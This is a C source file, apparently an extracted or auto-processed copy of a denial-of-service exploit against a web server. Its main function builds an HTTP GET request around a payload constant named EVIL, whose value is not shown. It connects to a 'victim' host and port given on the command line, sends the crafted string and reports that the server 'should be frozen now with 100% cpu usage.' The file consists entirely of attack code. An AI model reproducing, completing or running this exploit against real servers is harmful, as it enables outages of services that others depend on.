
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct hostent {int h_length; scalar_t__ h_addr; } ;
typedef int serv_addr ;


 int AF_INET ;
 char* EVIL ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int bcopy (char*,char*,int ) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr_in*,int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int printf (char*,...) ;
 int puts (char*) ;
 int send (int,char*,int ,int ) ;
 int snprintf (char*,int,char*,char*) ;
 int socket (int ,int ,int ) ;
 int strcat (char*,char*) ;
 int strlen (char*) ;
 int usage (char*) ;

int main(int argc, char **argv) {
 char buffer[50] = "GET /";
 int sock;
        struct sockaddr_in serv_addr;
        struct hostent *crap;

 if(argc != 3)
  usage(argv[0]);

 printf("# Making our evil buffer... ");
 snprintf(&buffer[5], 47, "%s", EVIL);
 strcat(buffer, "\r\n");
 printf("(done)\n");

        sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0)
                return printf("# error creating socket.\n");
        crap = gethostbyname(argv[1]);
        if(crap == ((void*)0))
                return printf("# cant resolve the specified hostname: %s\n", argv[1]);
        else
                printf("# connecting to victim... ");

        serv_addr.sin_family = AF_INET;
        serv_addr.sin_port = htons(atoi(argv[2]));
        bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);

        if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
                return printf("(error)\n# check again %s:%d\n", argv[1], atoi(argv[2]));

        printf("(done)\n# sending crafted string... ");
        if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
                return printf("\n# error while sending the crafted string.!\n");
 close(sock);
        return puts("(done)\n# The server should be frozen now with 100\% cpu usage.");

}
